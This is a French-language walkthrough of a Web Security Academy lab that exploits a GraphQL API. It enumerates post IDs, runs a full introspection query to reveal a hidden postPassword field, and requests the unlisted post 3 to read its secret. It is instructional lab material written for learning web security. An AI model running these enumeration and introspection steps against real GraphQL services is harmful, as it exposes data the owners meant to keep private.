Accès à des posts GraphQL privés

Accessing private GraphQL posts

Lab: Accessing private GraphQL posts | Web Security AcademyWebSecAcademy

Objectif du lab

La page du blog contient un article caché (non listé) qui renferme un mot de passe secret. Pour valider le lab, il faut retrouver ce post privé puis soumettre le mot de passe.

1) Reconnaissance du trafic GraphQL

En arrivant sur la page principale du blog, on observe (via l’onglet Network ou Burp) une requête GraphQL envoyée en arrière-plan :

Endpoint : POST /graphql/v1
Opération : getBlogSummaries

Exemple de requête interceptée :

{
  "query": "\nquery getBlogSummaries {\n    getAllBlogPosts {\n        image\n        title\n        summary\n        id\n    }\n}",
  "operationName": "getBlogSummaries"
}

Cette query retourne les posts visibles et leurs id. On remarque que la liste contient les pages/posts 1, 2, 4 et 5, mais qu’il manque l’ID 3 → très bon indicateur d’un post privé / caché.

2) Récupération d’un post par ID

Quand on ouvre un article, l’application envoie une autre query qui récupère le contenu complet à partir de l’ID :

{
  "query": "\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n        }\n    }",
  "operationName": "getBlogPost",
  "variables": {
    "id": 2
  }
}

Cela confirme qu’on peut énumérer des posts en modifiant variables.id.

3) Introspection pour découvrir le schéma

Pour voir toutes les propriétés disponibles, on utilise l’Introspection Query (ex. via InQL, GraphQL tab, ou un payload standard) :

query IntrospectionQuery {
    __schema {
        queryType {
            name
        }
        mutationType {
            name
        }
        subscriptionType {
            name
        }
        types {
            ...FullType
        }
        directives {
            name
            description
            locations
            args {
                ...InputValue
            }
        }
    }
}

fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
        name
        description
        args {
            ...InputValue
        }
        type {
            ...TypeRef
        }
        isDeprecated
        deprecationReason
    }
    inputFields {
        ...InputValue
    }
    interfaces {
        ...TypeRef
    }
    enumValues(includeDeprecated: true) {
        name
        description
        isDeprecated
        deprecationReason
    }
    possibleTypes {
        ...TypeRef
    }
}

fragment InputValue on __InputValue {
    name
    description
    type {
        ...TypeRef
    }
    defaultValue
}

fragment TypeRef on __Type {
    kind
    name
    ofType {
        kind
        name
        ofType {
            kind
            name
            ofType {
                kind
                name
            }
        }
    }
}gra

Réponse : 200 OK, très volumineuse (plus de 1000 lignes).

En l’analysant, on découvre un champ intéressant : postPassword.

4) Extraction du post caché (ID 3)

On relance getBlogPost en ajoutant le champ postPassword, puis on cible l’ID manquant (3) :

    query getBlogPost($id: Int!) {
        getBlogPost(id: $id) {
            image
            title
            author
            date
            paragraphs
            postPassword
        }
    }

Variables :

{
    "id":3
}

Résultat : la réponse contient directement la valeur de postPassword → c’est le mot de passe secret à soumettre dans la bannière du lab.

Mis à jour il y a 1 mois

hashtagAccessing private GraphQL posts

hashtagObjectif du lab

hashtag1) Reconnaissance du trafic GraphQL

hashtag2) Récupération d’un post par ID

hashtag3) Introspection pour découvrir le schéma

hashtag4) Extraction du post caché (ID 3)